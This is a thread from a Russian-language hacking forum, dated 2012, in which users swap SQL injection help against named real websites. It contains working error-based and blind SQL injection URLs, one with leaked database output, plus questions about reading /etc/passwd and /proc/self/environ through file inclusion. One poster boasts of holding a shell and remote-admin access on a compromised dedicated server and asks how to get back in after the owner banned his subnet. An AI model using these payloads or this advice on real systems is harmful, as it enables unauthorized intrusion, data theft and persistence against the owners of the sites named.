 |
|
01.04.2012, 02:06
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от Tigger
Причем тут фильтр?
Там банально идет trim(), который убирает нульбайт, если он идет в конце строки, поэтому правильнее всегда после нульбайта подставлять символ какой-нибудь.
Фильтры, ага. =\
А использование trim внутри php кода не является образно говоря фильтром? Термин фильтр понятие обобщающее , описывающе достаточно большой перечень методов и реализаций. Если я делаю trim() - я фильтрую(убираю) то что мне надо, те использую фильтр. К тому же не факт ,что там только или именно trim. Поэтому упрекать меня в неточности в данном случае неправильно. Или имеется иная аргументация?
|
|
|
01.04.2012, 20:20
|
|
Познающий
Регистрация: 07.11.2011
Сообщений: 91
С нами:
7638806
Репутация:
-6
|
|
I am not getting something here.
Код:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+
Nothing works, maybe there is no cheekbones. |
|
|
|
01.04.2012, 20:28
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от lightangel
I am not getting something here.
Код:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1+order+by+100+--+
Nothing works, maybe there is no cheekbones.
Код:
http://www.hdtvmagazine.com/programming/broadcast-market.php?dma_name=1')+and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+j
Код:
Error 1062: Duplicate entry 'COLLATIONS1' for key 1
|
|
|
|
01.04.2012, 21:32
|
|
Новичок
Регистрация: 27.02.2012
Сообщений: 10
С нами:
7477526
Репутация:
0
|
|
http://lineoutdoor.ru/portfolio/list/type/-2'
Определил имя базы b50893
блинд. подобрал таблицу portfolio так:
http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s
Перебирая номер буквы A и аски код X
Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?
|
|
|
|
01.04.2012, 21:42
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?
Кстати, путь имеет такой вид:
/www/apache/domains
Тут можно где-то найти логи?
|
|
|
|
01.04.2012, 21:45
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от kise
Что делать если при обращении к proc/self/environ вылетает ошибка, что файл не найден, а при обращении к etc/passwd выводится файл?
читать статьи =\
возможно прав не хватает, возможно это не Linux,а что то из семейства bsd, и еще куча чего
дальше буду стереть подобные посты
|
|
|
|
01.04.2012, 21:48
|
|
Познающий
Регистрация: 29.01.2012
Сообщений: 52
С нами:
7519286
Репутация:
-4
|
|
vlad-i-mir, а там случаем не error based?
|
|
|
|
01.04.2012, 21:53
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от vlad-i-mir
http://lineoutdoor.ru/portfolio/list/type/-2'
Определил имя базы b50893
блинд. подобрал таблицу portfolio так:
http://lineoutdoor.ru/portfolio/list/type/-2'+or+1=(substring((select+table_name+from+informa tion_schema.tables+where+table_schema=char(98,53,4 8,56,57,51)+limit+0,1),A,1)=char(X))+--+s
Перебирая номер буквы A и аски код X
Пытаюсь получить имена столбцов, но никак не выходит. Как быть дальше?
Error-based :
http://lineoutdoor.ru/portfolio/list/type/1112'+or+1+group+by+concat(%20(select+column_name+ from+information_schema.columns+where+table_name+l ike+'Portfolio'+limit+0,1),floor(rand(0)*2))%20hav ing%20min(0)--+
|
|
|
|
02.04.2012, 16:54
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
Вопрос мой конечно не по уязвимостям, но писать больше некуда.
Значится, поимел я сайт, радмин, дедик, шелл - все как полагается.
Злой админ конешн со мной изрядно боролся, но ничего у него не выходило(ламер редкостный ) Вы спросите почему я не захватил полностью дедик и не удалил всех к чертям? Да просто мне это не нужно совсем, пусть живут. Я так думал, пока я сегодня получил от хрома отказ зайти на сайт. Захожу на дедик - также. Чекаю через прокси - все работает. Ясен пень что меня забанили, да еще как искусно! По подсети!
Работать под своим реальным ip не очень то и хочется(носки использую). Носки добывать новые тоже не очень вариант. Подскажите как мне быстренько восстановить доступ. От чего это зависит от сервера или от конфига на сайте? Если на сервере то что и где там прописано, чтобы я не заходил? Сервер Windows NT, через прокси могу заходить на шелл, ну и сразу на комп соответсвенно.
|
|
|
|
02.04.2012, 21:59
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
На сайтe через .htaccess. А насчет деда, думаю маршуритизатор..
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
